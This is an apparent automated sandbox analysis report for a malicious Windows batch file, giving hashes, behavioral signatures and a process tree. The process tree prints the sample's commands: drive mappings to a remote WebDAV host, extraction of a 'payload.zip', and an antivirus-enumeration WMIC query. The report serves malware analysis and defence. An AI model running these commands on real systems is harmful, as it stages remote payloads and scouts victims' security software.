Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12/10/2023, 00:51
Static task
static1
Behavioral task
behavioral1
Sample
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Resource
win10v2004-20230915-en
General
-
Target
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
-
Size
1KB
-
MD5
3e04fa57bc1837dd6eb1ddfaaa0c8fb3
-
SHA1
52c4646dd2796cb4da7a50f6777e3a18f9d48179
-
SHA256
5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4
-
SHA512
d6679d25b561ff1162a9efffea72deff19e5b1b5a4fe74c5fca590fa1df276f0e24ae6f838a7fc5751533c15553c99c94fec2d3d86d4f6823c1579a9438f0bc6
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: net.exe File opened (read-only) \??\J: net.exe File opened (read-only) \??\G: net.exe File opened (read-only) \??\Y: net.exe File opened (read-only) \??\X: net.exe File opened (read-only) \??\S: net.exe File opened (read-only) \??\Q: net.exe File opened (read-only) \??\B: net.exe File opened (read-only) \??\L: net.exe File opened (read-only) \??\K: net.exe File opened (read-only) \??\E: net.exe File opened (read-only) \??\Z: net.exe File opened (read-only) \??\V: net.exe File opened (read-only) \??\T: net.exe File opened (read-only) \??\N: net.exe File opened (read-only) \??\M: net.exe File opened (read-only) \??\H: net.exe File opened (read-only) \??\A: net.exe File opened (read-only) \??\W: net.exe File opened (read-only) \??\U: net.exe File opened (read-only) \??\R: net.exe File opened (read-only) \??\O: net.exe File opened (read-only) \??\I: net.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1336 powershell.exe 1336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 1336 powershell.exe Token: SeIncreaseQuotaPrivilege 3536 WMIC.exe Token: SeSecurityPrivilege 3536 WMIC.exe Token: SeTakeOwnershipPrivilege 3536 WMIC.exe Token: SeLoadDriverPrivilege 3536 WMIC.exe Token: SeSystemProfilePrivilege 3536 WMIC.exe Token: SeSystemtimePrivilege 3536 WMIC.exe Token: SeProfSingleProcessPrivilege 3536 WMIC.exe Token: SeIncBasePriorityPrivilege 3536 WMIC.exe Token: SeCreatePagefilePrivilege 3536 WMIC.exe Token: SeBackupPrivilege 3536 WMIC.exe Token: SeRestorePrivilege 3536 WMIC.exe Token: SeShutdownPrivilege 3536 WMIC.exe Token: SeDebugPrivilege 3536 WMIC.exe Token: SeSystemEnvironmentPrivilege 3536 WMIC.exe Token: SeRemoteShutdownPrivilege 3536 WMIC.exe Token: SeUndockPrivilege 3536 WMIC.exe Token: SeManageVolumePrivilege 3536 WMIC.exe Token: 33 3536 WMIC.exe Token: 34 3536 WMIC.exe Token: 35 3536 WMIC.exe Token: 36 3536 WMIC.exe Token: SeIncreaseQuotaPrivilege 3536 WMIC.exe Token: SeSecurityPrivilege 3536 WMIC.exe Token: SeTakeOwnershipPrivilege 3536 WMIC.exe Token: SeLoadDriverPrivilege 3536 WMIC.exe Token: SeSystemProfilePrivilege 3536 WMIC.exe Token: SeSystemtimePrivilege 3536 WMIC.exe Token: SeProfSingleProcessPrivilege 3536 WMIC.exe Token: SeIncBasePriorityPrivilege 3536 WMIC.exe Token: SeCreatePagefilePrivilege 3536 WMIC.exe Token: SeBackupPrivilege 3536 WMIC.exe Token: SeRestorePrivilege 3536 WMIC.exe Token: SeShutdownPrivilege 3536 WMIC.exe Token: SeDebugPrivilege 3536 WMIC.exe Token: SeSystemEnvironmentPrivilege 3536 WMIC.exe Token: SeRemoteShutdownPrivilege 3536 WMIC.exe Token: SeUndockPrivilege 3536 WMIC.exe Token: SeManageVolumePrivilege 3536 WMIC.exe Token: 33 3536 WMIC.exe Token: 34 3536 WMIC.exe Token: 35 3536 WMIC.exe Token: 36 3536 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2204 wrote to memory of 4872 2204 cmd.exe 86 PID 2204 wrote to memory of 4872 2204 cmd.exe 86 PID 4872 wrote to memory of 4736 4872 cmd.exe 88 PID 4872 wrote to memory of 4736 4872 cmd.exe 88 PID 4872 wrote to memory of 5080 4872 cmd.exe 89 PID 4872 wrote to memory of 5080 4872 cmd.exe 89 PID 4872 wrote to memory of 3048 4872 cmd.exe 90 PID 4872 wrote to memory of 3048 4872 cmd.exe 90 PID 4872 wrote to memory of 1532 4872 cmd.exe 91 PID 4872 wrote to memory of 1532 4872 cmd.exe 91 PID 4872 wrote to memory of 2068 4872 cmd.exe 92 PID 4872 wrote to memory of 2068 4872 cmd.exe 92 PID 4872 wrote to memory of 4440 4872 cmd.exe 93 PID 4872 wrote to memory of 4440 4872 cmd.exe 93 PID 4872 wrote to memory of 1440 4872 cmd.exe 94 PID 4872 wrote to memory of 1440 4872 cmd.exe 94 PID 4872 wrote to memory of 5076 4872 cmd.exe 95 PID 4872 wrote to memory of 5076 4872 cmd.exe 95 PID 4872 wrote to memory of 3328 4872 cmd.exe 96 PID 4872 wrote to memory of 3328 4872 cmd.exe 96 PID 4872 wrote to memory of 2312 4872 cmd.exe 97 PID 4872 wrote to memory of 2312 4872 cmd.exe 97 PID 4872 wrote to memory of 2476 4872 cmd.exe 98 PID 4872 wrote to memory of 2476 4872 cmd.exe 98 PID 4872 wrote to memory of 4324 4872 cmd.exe 99 PID 4872 wrote to memory of 4324 4872 cmd.exe 99 PID 4872 wrote to memory of 1420 4872 cmd.exe 101 PID 4872 wrote to memory of 1420 4872 cmd.exe 101 PID 4872 wrote to memory of 668 4872 cmd.exe 102 PID 4872 wrote to memory of 668 4872 cmd.exe 102 PID 4872 wrote to memory of 3780 4872 cmd.exe 103 PID 4872 wrote to memory of 3780 4872 cmd.exe 103 PID 4872 wrote to memory of 4580 4872 cmd.exe 104 PID 4872 wrote to memory of 4580 4872 cmd.exe 104 PID 4872 wrote to memory of 1996 4872 cmd.exe 105 PID 4872 wrote to memory of 1996 4872 cmd.exe 105 PID 4872 wrote to memory of 4128 4872 cmd.exe 106 PID 4872 wrote to memory of 4128 4872 cmd.exe 106 PID 4872 wrote to memory of 3952 4872 cmd.exe 107 PID 4872 wrote to memory of 3952 4872 cmd.exe 107 PID 4872 wrote to memory of 4908 4872 cmd.exe 108 PID 4872 wrote to memory of 4908 4872 cmd.exe 108 PID 4872 wrote to memory of 5012 4872 cmd.exe 109 PID 4872 wrote to memory of 5012 4872 cmd.exe 109 PID 4872 wrote to memory of 2356 4872 cmd.exe 110 PID 4872 wrote to memory of 2356 4872 cmd.exe 110 PID 4872 wrote to memory of 2056 4872 cmd.exe 111 PID 4872 wrote to memory of 2056 4872 cmd.exe 111 PID 4872 wrote to memory of 3796 4872 cmd.exe 112 PID 4872 wrote to memory of 3796 4872 cmd.exe 112 PID 4872 wrote to memory of 4536 4872 cmd.exe 113 PID 4872 wrote to memory of 4536 4872 cmd.exe 113 PID 4872 wrote to memory of 3872 4872 cmd.exe 114 PID 4872 wrote to memory of 3872 4872 cmd.exe 114 PID 4872 wrote to memory of 1336 4872 cmd.exe 115 PID 4872 wrote to memory of 1336 4872 cmd.exe 115 PID 4872 wrote to memory of 3712 4872 cmd.exe 116 PID 4872 wrote to memory of 3712 4872 cmd.exe 116 PID 3712 wrote to memory of 972 3712 net.exe 117 PID 3712 wrote to memory of 972 3712 net.exe 117 PID 4872 wrote to memory of 4112 4872 cmd.exe 118 PID 4872 wrote to memory of 4112 4872 cmd.exe 118 PID 4112 wrote to memory of 3536 4112 cmd.exe 119 PID 4112 wrote to memory of 3536 4112 cmd.exe 119
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat min2⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\system32\net.exenet use Z: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4736
-
-
C:\Windows\system32\net.exenet use Y: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:5080
-
-
C:\Windows\system32\net.exenet use X: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:3048
-
-
C:\Windows\system32\net.exenet use W: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1532
-
-
C:\Windows\system32\net.exenet use V: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2068
-
-
C:\Windows\system32\net.exenet use U: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4440
-
-
C:\Windows\system32\net.exenet use T: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1440
-
-
C:\Windows\system32\net.exenet use S: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:5076
-
-
C:\Windows\system32\net.exenet use R: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:3328
-
-
C:\Windows\system32\net.exenet use Q: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2312
-
-
C:\Windows\system32\net.exenet use P: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2476
-
-
C:\Windows\system32\net.exenet use O: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4324
-
-
C:\Windows\system32\net.exenet use N: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1420
-
-
C:\Windows\system32\net.exenet use M: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:668
-
-
C:\Windows\system32\net.exenet use L: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:3780
-
-
C:\Windows\system32\net.exenet use K: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4580
-
-
C:\Windows\system32\net.exenet use J: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:1996
-
-
C:\Windows\system32\net.exenet use I: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4128
-
-
C:\Windows\system32\net.exenet use H: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:3952
-
-
C:\Windows\system32\net.exenet use G: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4908
-
-
C:\Windows\system32\net.exenet use F: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:5012
-
-
C:\Windows\system32\net.exenet use E: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:2356
-
-
C:\Windows\system32\net.exenet use D: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:2056
-
-
C:\Windows\system32\net.exenet use C: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵PID:3796
-
-
C:\Windows\system32\net.exenet use B: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:4536
-
-
C:\Windows\system32\net.exenet use A: \\172.96.161.208@8080\DavWWWRoot /user:username password3⤵
- Enumerates connected drives
PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'C:\Users\Admin\Pictures\payload.zip' -DestinationPath 'C:\Users\Admin\Pictures\' -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\system32\net.exenet use /delete3⤵
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 use /delete4⤵PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value3⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82